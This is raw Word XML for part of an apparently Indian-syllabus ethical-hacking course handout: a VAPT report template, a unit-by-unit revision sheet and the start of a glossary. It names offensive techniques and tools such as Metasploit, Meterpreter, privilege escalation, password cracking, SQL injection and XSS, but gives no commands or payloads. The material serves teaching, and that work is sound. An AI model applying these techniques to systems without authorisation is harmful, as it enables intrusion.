              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VAPT Report Template</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">COVER PAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client / Lab: [name]        Tester: [your name]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Date: [date]                Classification: Confidential</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Scope: [IP ranges / domains / applications in scope]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">EXECUTIVE SUMMARY (1 page, non-technical)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Overall risk rating: [Critical/High/Medium/Low]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Summary of what was tested and found, in plain language.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Top 3 recommendations.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCOPE &amp; METHODOLOGY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Tools used: [Nmap, Nessus, Metasploit, Burp Suite, ...]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Approach: [black-box / grey-box], [dates/timeframe]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Out of scope: [explicitly list anything excluded]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TECHNICAL FINDINGS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  --- Finding F1 ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Title:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Severity: [Critical/High/Medium/Low/Informational]  CVSS: [score] ([vector string])</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Affected System/Component:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Description:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Proof of Concept / Evidence: [screenshot reference]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Business Impact:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Remediation Recommendation:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Reference: [CVE / CWE if applicable]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  (repeat for each finding, minimum 6 for the capstone)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RISK HEAT MAP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Plot of all findings: Likelihood x Impact grid]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REMEDIATION PRIORITY TABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  | Finding | Severity | Priority | Owner | Target date |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CONCLUSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Overall security posture, closing recommendation, offer of re-test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject Revision Sheet</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1267"/>
        <w:gridCol w:w="8479"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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Unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8479"/>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Core ideas to remember</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="847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Authorisation + intent define “ethical”; IT Act Sections 43/65/66/66B/66C/66F; RoE/NDA/scope before anything; 5 phases; Cyber Kill Chain; Red/Blue/Purple; VAPT vs PT vs VA; PTES; OWASP WSTG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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II</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8479"/>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Passive (OSINT, WHOIS, DNS, Shodan, theHarvester, Maltego, LinkedIn, Recon-ng) vs Active (Nmap scan types, NSE, enumeration); CVSS v3.1 six base metrics; nvd.nist.gov; false positives need validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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III</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="847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Metasploit modules (auxiliary/exploit/payload/encoder/NOP/post); msfconsole workflow; RHOST/LHOST; staged vs stageless; Meterpreter commands; Linux priv-esc (sudo -l, SUID, GTFOBins); Windows priv-esc; John/Hashcat/Hydra; salting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8479"/>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OWASP Top 10 (A01–A08 as per syllabus, with the official-numbering clarification for SSRF); Burp Suite workflow; SQLi UNION extraction; Reflected/Stored/DOM XSS; file upload validation; CSRF tokens; brute-force with Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="847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Report structure; CVSS worked examples (backdoor=Critical, stored XSS=Medium, and why); risk heat maps; remediation strategies; responsible disclosure, bug bounty; Security+/CEH/eJPT/OSCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Glossary</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2534"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7212"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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AXFR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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DNS zone transfer mechanism; if misconfigured, leaks an entire DNS zone to any requester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Bug bounty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 programme rewarding researchers for responsibly disclosed vulnerabilities (e.g. HackerOne, Bugcrowd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Banner grabbing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Manually connecting to a service to read its self-reported version string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Cross-Site Request Forgery — tricking a logged-in victim's browser into submitting an unwanted request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Content Security Policy — an HTTP header restricting which script/content sources a browser will execute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Common Vulnerabilities and Exposures — a unique public identifier for a known vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Common Vulnerability Scoring System — a standard formula producing a 0–10 severity score from six base metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Common Weakness Enumeration — a classification of vulnerability </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">types</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. CWE-89 for SQL Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Damn Vulnerable Web Application — an intentionally vulnerable PHP/MySQL app used for safe, legal practice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Actively querying a service (SMB, SNMP, SMTP) to extract detailed information such as usernames or shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Code or technique that takes advantage of a specific vulnerability to achieve unauthorised access or control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 public catalogue of standard Unix binaries and how each can be abused for privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Insecure Direct Object Reference — accessing another user's data by changing a trusted identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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An advanced, in-memory Metasploit payload providing a rich post-exploitation command set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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NDA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Non-Disclosure Agreement — legally binds a tester to keep client data and findings confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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NSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Nmap Scripting Engine — Lua-based scripts extending Nmap for enumeration and vulnerability checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Open-Source Intelligence — information gathered from publicly available sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
